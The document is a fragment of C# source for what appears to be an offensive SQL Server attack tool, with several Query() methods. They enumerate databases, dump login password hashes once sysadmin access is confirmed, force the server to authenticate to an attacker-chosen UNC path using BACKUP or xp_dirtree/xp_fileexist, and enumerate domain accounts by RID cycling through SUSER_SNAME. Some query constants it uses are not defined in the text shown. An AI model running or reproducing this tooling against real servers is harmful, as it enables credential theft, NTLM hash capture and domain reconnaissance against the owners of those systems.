internal override bool Query()
{
string query1_1 = string.Format(
"SELECT \'{0}\' as [ComputerName],\n" +
"\'{1}\' as [Instance],",
computerName, instance);
int versionShort = 0;
using (SQLConnection sql = new SQLConnection(instance))
{
sql.BuildConnectionString(credentials);
if (!sql.Connect())
{
return(false);
}
SQLServerInfo serverInfo = new SQLServerInfo(credentials);
serverInfo.SetInstance(instance);
if (!serverInfo.Query())
{
return(false);
}
SQLServerInfo.Details details = serverInfo.GetResults();
int.TryParse(details.SQLServerMajorVersion.Split('.').First(), out versionShort);
StringBuilder sb = new StringBuilder();
sb.Append(query1_1);
sb.Append(query1_2);
if (versionShort > 10)
{
sb.Append(query1_3);
}
sb.Append(query1_4);
if (!string.IsNullOrEmpty(databaseFilter))
{
sb.Append(databaseFilter);
}
if (!string.IsNullOrEmpty(noDefaultsFilter))
{
sb.Append(noDefaultsFilter);
}
if (!string.IsNullOrEmpty(hasAccessFilter))
{
sb.Append(hasAccessFilter);
}
if (!string.IsNullOrEmpty(sysAdminFilter))
{
sb.Append(sysAdminFilter);
}
#if DEBUG
Console.WriteLine(sb.ToString());
#endif
databases = sql.Query <Database>(sb.ToString(), new Database());
}
return(true);
}
internal override bool Query()
{
using (SQLConnection sql = new SQLConnection(instance))
{
sql.BuildConnectionString(credentials);
if (!sql.Connect())
{
return(false);
}
if (!SQLSysadminCheck.Query(instance, computerName, credentials))
{
Console.WriteLine("[-] User is not Sysadmin");
return(false);
}
SQLServerInfo i = new SQLServerInfo(credentials);
i.SetInstance(instance);
i.Query();
SQLServerInfo.Details d = i.GetResults();
int versionShort;
if (!int.TryParse(d.SQLServerMajorVersion.Split('.').First(), out versionShort))
{
Console.WriteLine("[-] Unable to ascertain SQL Version");
Console.WriteLine("[*] It is possible to override this with the --version flag");
return(false);
}
string query = string.Empty;
if (8 < versionShort)
{
query = QUERY1_1;
}
else
{
query = QUERY2_1;
}
//table = sql.Query(query);
hashes = sql.Query <Hash>(query, new Hash());
}
return(false);
}
internal override bool Query()
{
using (SQLConnection sql = new SQLConnection(instance))
{
sql.BuildConnectionString(credentials);
if (sql.Connect())
{
SQLServerInfo i = new SQLServerInfo(credentials);
i.SetInstance(instance);
i.Query();
SQLServerInfo.Details d = i.GetResults();
int versionShort;
if (!int.TryParse(d.SQLServerMajorVersion.Split('.').First(), out versionShort))
{
Console.WriteLine("[-] Unable to ascertain SQL Version");
Console.WriteLine("[*] It is possible to override this with the --version flag");
return(false);
}
string query1 = string.Empty;
string query2 = string.Empty;
if (11 > versionShort)
{
query1 = string.Format("BACKUP LOG [TESTING] TO DISK = \'{0}\'", uncpath);
query2 = string.Format("BACKUP DATABASE [TESTING] TO DISK = \'{0}\'", uncpath);
}
else
{
query1 = string.Format("xp_dirtree \'{0}\'", uncpath);
query2 = string.Format("xp_fileexist \'{0}\'", uncpath);
}
_Query(sql, query1);
_Query(sql, query2);
}
}
return(true);
}
internal override bool Query()
{
using (SQLConnection sql = new SQLConnection(instance))
{
sql.BuildConnectionString(credentials);
if (!sql.Connect())
{
return(false);
}
SQLServerInfo info = new SQLServerInfo(credentials);
info.SetInstance(instance);
info.Query();
SQLServerInfo.Details d = info.GetResults();
domainName = d.DomainName;
string query1_1 = string.Format("SELECT SUSER_SID(\'{0}\\{1}\') as DomainGroupSid", domainName, domainGroup);
#if DEBUG
Console.WriteLine(query1_1);
#endif
DataTable table = sql.Query(query1_1);
byte[] sidBytes = (byte[])table.AsEnumerable().First()["DomainGroupSid"];
string strSid = BitConverter.ToString(sidBytes).Replace("-", "").Substring(0, 48);
Console.WriteLine("Base SID: {0}", strSid);
for (int i = start; i <= end; i++)
{
string strHexI = i.ToString("x");
int nStrHexI = strHexI.Length;
string rid = strHexI;
if (0 != nStrHexI % 2)
{
rid = "0" + strHexI;
}
string[] arrSplit = Split(rid, 2).ToArray();
Array.Reverse(arrSplit);
rid = string.Join("", arrSplit);
rid = rid.PadRight(8, '0');
rid = "0x" + strSid + rid;
string query2_1 = string.Format("SELECT SUSER_SNAME({0}) as [DomainAccount]", rid);
#if DEBUG
Console.WriteLine(query2_1);
#endif
table = sql.Query(query2_1);
foreach (DataRow row in table.AsEnumerable())
{
try
{
if (row["DomainAccount"] is DBNull)
{
continue;
}
Fuzz f = new Fuzz
{
ComputerName = computerName,
Instance = instance,
SID = rid,
RID = i,
DomainAccount = (string)row["DomainAccount"],
};
fuzzed.Add(f);
}
catch (Exception ex)
{
if (ex is ArgumentNullException)
{
continue;
}
else
{
Console.WriteLine(ex.Message);
}
return(false);
}
}
}
}
return(true);
}